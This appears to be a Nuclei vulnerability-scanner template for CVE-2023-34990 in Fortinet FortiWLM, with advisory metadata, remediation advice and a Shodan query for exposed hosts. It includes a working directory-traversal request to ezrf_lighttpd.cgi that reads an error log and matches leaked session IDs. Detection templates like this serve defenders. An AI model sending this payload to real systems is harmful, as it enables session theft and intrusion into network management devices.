id: CVE-2023-34990

info:
  name: FortiWLM - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
  impact: |
    Unauthenticated attackers can exploit path traversal through the imagename parameter in ezrf_lighttpd.cgi to read arbitrary files and potentially execute unauthorized code, compromising the entire Fortinet FortiWLM wireless LAN management system.
  remediation: |
    Update Fortinet FortiWLM to version 8.6.6 or 8.5.5 or later that validates file paths in ezrf_lighttpd.cgi and prevents directory traversal attacks.
  reference:
    - https://fortiguard.com/psirt/FG-IR-23-144
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34990
    cwe-id: CWE-94,CWE-23
    epss-score: 0.72874
    epss-percentile: 0.98799
  metadata:
    max-request: 1
    shodan-query: title:"FortiWLM Login"
  tags: cve,cve2023,fortiwlm,lfi,cisa,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wlm/login?next=/wlm HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<title>FortiWLM Login</title>")'
        condition: and

  - raw:
      - |
        GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: response
        regex:
          - 'sessionid=([A-F0-9]+)'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210094544731f3c1aa12020cb1b150d1166bd5e853a14d2922affed369e94bfaa0af02202ad4e5f112cb2aa65be9dcb3878f4cdccaf072ca5a3aa5431d17b10fd0d23b41:922c64590222798bb761d5b6d8e72950